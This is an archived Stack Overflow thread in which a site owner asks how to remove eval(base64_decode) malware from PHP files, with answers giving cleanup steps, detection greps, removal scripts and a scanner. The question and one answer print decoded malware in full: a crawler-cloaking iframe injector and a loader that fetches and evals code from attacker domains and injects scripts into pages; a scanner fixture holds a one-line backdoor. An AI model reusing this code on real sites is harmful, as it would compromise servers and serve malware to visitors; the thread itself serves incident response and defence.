Original URL: http://stackoverflow.com/questions/5922762/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
How to get rid of eval-base64_decode like PHP virus files?
Asked by fractalbit
My site (very large community website) was recently infected with a virus. Every index.php file was changed so that the opening php tag of these files was changed to the following line:
<?php eval(base64_decode('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'));
When I decoded this, it produced the following PHP code:
<?php
error_reporting(0); // suppress any warnings the injected code itself produces
$bot = FALSE ;
// case-sensitive user-agent fragments (strpos); a match means "crawler/scanner, hide the payload"
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
// inclusive IPv4 ranges (first, last) whose visitors are also treated as bots
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
// sprintf("%u") turns ip2long()'s signed 32-bit result into an unsigned value so ranges above 127.x.x.x compare correctly
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
// everyone else (ordinary browsers) gets an off-screen 2x2 iframe pointing at the attacker's domain
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}
I've tried several things to clean the virus even restoring from a backup and the files get re-infected after a few minutes or hours. So can you please help me?
What do you know about this virus?
Is there a known security hole it uses to install and propagate?
What does the above PHP code actually do?
What does the page it embeds in the iframe do?
And of course more importantly: What can I do to get rid of it?
Please help, we have almost run out of ideas and hope :(
UPDATE 1: Some more details: A weird thing is: when we first checked the infected files, they were changed but their modified time in the FTP program was showing last access to be days, months or even years ago in some cases! How is this even possible? It drives me crazy!
UPDATE 2: I think the problem initiated after a user installed a plugin in his Wordpress installation. After restoring from backup and completely deleting the Wordpress folder and the associated db the problem seems gone. We have currently subscribed to a security service and they are investigating the issue just to be sure the hack is gone for good. Thanks to anyone who replied.
Answered by Luke Stevenson
Steps to recover and disinfect your site (provided you have a known good backup).
1) Shut Down the Site
You need to basically close the door to your site before you do your remedial work. This will prevent visitors getting malicious code, seeing error messages, etc. Just good practice.
You should be able to do this by putting the following into your .htaccess file in the webroot. (Replace "!!Your IP Address Here!!" with your own IP address - see http://icanhazip.com if you don't know your IP address.)
order deny,allow
deny from all
allow from !!Your IP Address Here!!
2) Download a Copy of All of your Files from the Server
Download everything into a separate folder from your good backups. This may take a while (dependent on your site size, connection speed, etc).
3) Download and Install a File/Folder Comparison Utility
On a Windows machine, you can use WinMerge - http://winmerge.org/ - it's free and quite powerful. On a MacOS machine, check out the list of possible alternates from Alternative.to
4) Run the File/Folder Comparison Utility
You should end up with a few different results:
- Files are Identical - The current file is the same as your backup, and so is unaffected.
- File on Left/Right Side Only - That file either only exists in the backup (and may have been deleted from the server), or only exists on the server (and may have been injected/created by the hacker).
- File is Different - The file on the server is not the same as the one in the backup, so it may have been modified by you (to configure it for the server) or by the hacker (to inject code).
5) Resolve the Differences
(a.k.a "Why can't we all just get along?")
For Files which are Identical, no further action is required. For Files which Exist on One Side Only, look at the file and figure out whether they are legitimate (ie user uploads which should be there, additional files you may have added, etc.) For Files which are Different, look at the file (the File Difference Utility may even show you which lines have been added/modified/removed) and see whether the server version is valid. Overwrite (with the backed-up version) any files which contain malicious code.
6) Review your Security Precautions
Whether this is as simple as changing your FTP/cPanel Passwords, or reviewing your use of external/uncontrolled resources (as you mention you are performing a lot of fgets, fopens, etc. you may want to check the parameters being passed to them as that is a way to make scripts pull in malicious code), etc.
7) Check the Site Works
Take the opportunity of being the only person looking at the site to make sure that everything is still operating as expected, after the infected files are corrected and malicious files have been removed.
8) Open the Doors
Reverse the changes made in the .htaccess file in Step 1. Watch carefully. Keep an eye on your visitor and error logs to see if anyone tries to trigger the removed malicious files, etc.
9) Consider Automated Detection Methods
There are a few solutions, allowing for you to have an automated check performed on your host (using a CRON job) which will detect and detail any changes which occur. Some are a bit verbose (you will get an email for each and every file changed), but you should be able to adapt them to your needs:
- Tripwire - a PHP script to detect and report new, deleted or modified files
- Shell script to monitor file changes
- How to detect if your webserver is hacked and get alerted
10) Have Scheduled Backups, and Retain a Good Bracket
Make sure you have scheduled backups performed on your website, keep a few of them, so you have different steps you can go back in time, if necessary. For instance, if you performed weekly backups, you might want to keep the following:
- 4 x Weekly Backups
- 4 x Monthly Backups (you retain one of the Weekly Backups, maybe the first week of the month, as the Monthly Backup)
These will always make life easier if you have someone attack your site with something a bit more destructive than a code injection attack.
Oh, and ensure you backup your databases too - with a lot of sites being based on CMSes, having the files is nice, but if you lose/corrupt the database behind them, well, the backups are basically useless.
Answered by Nick ODell
First, shut off your site until you can figure out how he got in and how to fix it. That looks like it's serving malware to your clients.
Next, search through your php files for fgets, fopen, fputs, eval, or system. I recommend notepad++ because of its "Find in Files" feature. Also, make sure that that's the only place your PHP has been modified. Do you have an offline copy to compare against?
Answered by Erion Omeri
I suffered from the same hack job. I was able to decrypt the code as well, and while I got different php code, I started by removing the injected php text by looping through each php file in the site and removing the eval call. I am still investigating how I got it to begin with but here is what mine looked like after decrypting from this website:
To decode the encrypted php script on each php file use this: http://www.opinionatedgeek.com/dotnet/tools/base64decode/
And formatting the result using this guy: http://beta.phpformatter.com/
To clean you need to remove the "eval" line from the top of each php file, and delete the .log folders from the base folder of the website.
I found a python script which I modified slightly to remove the trojan in php files so I will post it here for others to use: code source from thread: replace ALL instances of a character with another one in all files hierarchically in directory tree
import os
import re
import sys

# Only touch .php files; set to False to scan every file in the tree.
replace_extensions = True

def try_to_replace(fname):
    if replace_extensions:
        return fname.lower().endswith(".php")
    return True

def file_replace(fname, pat, s_after):
    # first, see if the pattern is even in the file.
    # surrogateescape keeps non-UTF-8 bytes intact instead of crashing on them.
    with open(fname, encoding="utf-8", errors="surrogateescape") as f:
        if not any(pat.search(line) for line in f):
            return  # pattern does not occur in file so we are done.
    # pattern is in the file, so perform replace operation via a temp file.
    out_fname = fname + ".tmp"
    with open(fname, encoding="utf-8", errors="surrogateescape") as f, \
         open(out_fname, "w", encoding="utf-8", errors="surrogateescape") as out:
        for line in f:
            out.write(pat.sub(s_after, line))
    os.rename(out_fname, fname)

def mass_replace(dir_name, s_before, s_after):
    pat = re.compile(s_before)
    for dirpath, dirnames, filenames in os.walk(dir_name):
        for fname in filenames:
            if try_to_replace(fname):
                print("cleaning: " + fname)
                fullname = os.path.join(dirpath, fname)
                file_replace(fullname, pat, s_after)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        u = "Usage: rescue.py <dir_name>\n"
        sys.stderr.write(u)
        sys.exit(1)
    # [^.]* works because a base64 literal never contains a '.'
    mass_replace(sys.argv[1], r"eval\(base64_decode\([^.]*\)\);", "")
To use, type:
python rescue.py rootfolder
This is what the malicious script was trying to do:
<?php
if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (!function_exists('mrobh')) {
function get_tds_777($url)
{
$content = "";
$content = @trycurl_777($url);
if ($content !== false)
return $content;
$content = @tryfile_777($url);
if ($content !== false)
return $content;
$content = @tryfopen_777($url);
if ($content !== false)
return $content;
$content = @tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = @trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777($url)
{
if (function_exists('file') === false)
return false;
$inc = @file($url);
$buf = @implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = @fopen($url, 'r');
if ($f) {
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = @fsockopen($host, 80, $errno, $errstr, 30);
if (!$f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function trysocket_777($url)
{
if (function_exists('socket_create') === false)
return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = @gethostbyname($host);
$ip2 = @long2ip(@ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!@socket_connect($sock, $ip1, 80)) {
@socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
@socket_close($sock);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function update_tds_file_777($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = @fopen($tdsfile, "w");
if ($f) {
@fwrite($f, $val);
@fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (@file_exists($tdsfile)) {
$mtime = @filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = @file_get_contents($tdsfile);
}
} else {
$content = update_tds_file_777($tdsfile);
}
$tds = @explode("\n", $content);
$c = @count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (!@is_dir($rz)) {
@mkdir($rz);
if (@is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (!@is_dir($rz)) {
@mkdir($rz);
if (@is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = base64_decode('http://ens122zzzddazz.com/');
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
$_SERVER['s_a2'] = base64_decode('http://nlinthewood.com/g_load.php') . $d;
$_SERVER['s_script'] = "nl.php?p=d";
}
setup_globals_777();
if (!function_exists('gml_777')) {
function gml_777()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
return $r_string_777;
}
}
if (!function_exists('gzdecodeit')) {
function gzdecodeit($decode)
{
$t = @ord(@substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = @unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = @gzinflate(@substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh($content)
{
@Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
ob_start('mrobh');
}
}
?>
Answered by kenorb
To get rid of these malicious PHP files you simply need to remove them. If the file is infected, you need to remove only the part which looks suspicious.
It's always tricky to find these files, because usually there are multiple of them across your web root.
Usually if you see some kind of obfuscation, it's a red alert for you.
Most of the malware is easy to find based on the common functions which it uses; this includes:
- base64_decode
- lzw_decompress
- eval
- and so on
By using an encoding format, they compact their size and make themselves more difficult to decode for non-experienced users.
Here are a few grep commands which may find the most common malware PHP code:
grep -R 'return.*base64_decode' .
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .
You can run these commands on the server or once you have synchronised your website onto your local machine (via FTP, e.g. ncftpget -R).
Or use scan tools which are specially designed for finding that kind of malicious files, see: PHP security scanners.
For education purposes, please find the following collection of PHP exploit scripts, found when investigating hacked servers, available at kenorb/php-exploit-scripts on GitHub (influenced by @Mattias' original collection). This will give you an understanding of what these suspicious PHP files look like, so you can learn how to find more of them on your server.
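A small scanner that combines the advice in Nick ODell's and kenorb's answers, added here as an example (not code from either answer, nor from the kenorb/php-exploit-scripts collection): it greps PHP files for the functions named above, ranks hits so an obfuscated eval() outranks a plain fopen(), and unwraps nested eval(base64_decode('...')) literals with Python's base64 module instead of a web decoder, so the payload is read but never executed. The signature tiers, the length threshold and the sample files it scans are my own construction.

```python
import base64
import re
import tempfile
from pathlib import Path

# Signature tiers, most severe first (dict order is the ranking). The function
# names are those the answers grep for; the tiers and thresholds are assumptions.
SIGNATURES = {
    "obfuscated_eval": re.compile(rb"\beval\s*\(\s*@?\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "eval":            re.compile(rb"\beval\s*\("),
    "command_exec":    re.compile(rb"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    "long_base64":     re.compile(rb"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
    "remote_fetch":    re.compile(rb"\b(?:fopen|file_get_contents|fgets|fsockopen|curl_init)\s*\("),
}
RANK = {name: i for i, name in enumerate(SIGNATURES)}
B64_LITERAL = re.compile(rb"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_payloads(data, depth=4):
    """Decode every base64_decode('<literal>') in data and recurse into the
    result, so a chain of eval(base64_decode()) wrappers is unwrapped without
    executing anything. Returns the stages outermost first."""
    found = []
    for m in B64_LITERAL.finditer(data):
        try:
            inner = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        found.append(inner)
        if depth > 1:
            found.extend(decode_payloads(inner, depth - 1))
    return found


def scan_file(path, rel):
    data = path.read_bytes()
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(data))
    payloads = decode_payloads(data) if "obfuscated_eval" in hits else []
    return {"path": rel, "hits": hits, "payloads": payloads}


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Findings for every PHP-like file that triggers a signature, most
    suspicious first. A bare fopen/fgets hit sorts last: per Nick ODell, read
    its arguments rather than deleting the file."""
    root = Path(root)
    findings = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            f = scan_file(p, p.relative_to(root).as_posix())
            if f["hits"]:
                findings.append(f)
    findings.sort(key=lambda f: (min(RANK[h] for h in f["hits"]), f["path"]))
    return findings


def build_demo(base):
    """Constructed sample site (not real data): index.php carries a two-stage
    eval(base64_decode()) wrapper, uploads/.x.php a one-line backdoor,
    lib/db.php a legitimate fopen() that only needs review."""
    inner = b"error_reporting(0); echo '<iframe src=\"http://example.invalid/\"></iframe>';"
    stage1 = b"eval(base64_decode('" + base64.b64encode(inner) + b"'));"
    files = {
        "index.php": b"<?php eval(base64_decode('" + base64.b64encode(stage1) + b"'));\n<html>site</html>\n",
        "uploads/.x.php": b"<?php @eval($_POST['c']);\n",
        "lib/db.php": b"<?php\n$f = fopen('/var/log/app.log', 'r');\nwhile (($l = fgets($f)) !== false) echo $l;\nfclose($f);\n",
        "about.php": b"<?php include 'header.php'; ?>\n<p>About us</p>\n",
        "logo.png": b"\x89PNG not scanned",
    }
    for rel, data in files.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    return Path(base)


def run_demo():
    with tempfile.TemporaryDirectory() as d:
        return scan_tree(build_demo(d))


if __name__ == "__main__":
    for f in run_demo():
        print(f["path"], f["hits"])
        for i, p in enumerate(f["payloads"], 1):
            print(f"  stage {i}: {p[:70]!r}")
```

Point scan_tree() at the web root (or at the FTP mirror kenorb suggests) and review findings top-down; the decoded stages tell you what the payload does, as with the cloaking script in the question, without pasting it into a third-party site.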
Answered by Radu
My websites / or websites I host were hit several times with similar attacks.
I present what I did to resolve the issue. I don't pretend it's the best / easiest approach but it works and since then I can proactively keep the ball in my field.
- Solve the issue ASAP. I created a very simple PHP script (it was written when the iron was hot so maybe it's not the most optimized code BUT it solves the problem pretty fast): http://www.ecommy.com/web-security/clean-php-files-from-eval-infection
- Make sure you know when something like this hits again. Hackers use all kinds of approaches, from SQL injection of one of the external modules you install to brute-forcing your admin panel with dictionary attacks or very well known password patterns like 1qaz..., qwerty..., etc. I present the scripts here: http://www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections
- The cron entry would be something like: 0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1&
I updated the pages so someone can download the files directly. Hope it will be useful for you as it is for me :)
Answered by reflexiv
- Ensure any popular web applications like Wordpress or vBulletin are updated. There are many exploits with the old versions that can lead to your server getting compromised and it will probably happen again if they are not updated. No use in proceeding until this is done.
- If the files keep getting replaced then there is a rootkit or trojan running in the background. That file cannot replicate itself. You will have to get rid of the rootkit first. Try rkhunter, chkrootkit, and LMD. Compare the output of ps aux to a secured server and check /var/tmp and /tmp for suspicious files. You might have to reinstall the OS.
- Ensure all workstations administrating the server are up to date and clean. Do not connect via insecure wireless connections or use plain text authentication like with FTP (use SFTP instead). Only log into control panels with https.
- To prevent this from happening again run csf or a comparable firewall, daily LMD scans, and stay current with the latest security patches for all applications on the server.
Answered by trm
Assuming this is a Linux-based server and you have SSH access, you could run this to remove the offending code:
find . -name "*.php" -print0 | xargs -0 sed -i 's@eval[ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;@@'
This covers all known base64 implementations, and will work whether the base64 text is surrounded by single or double quotes
EDIT: now works with internal whitespace also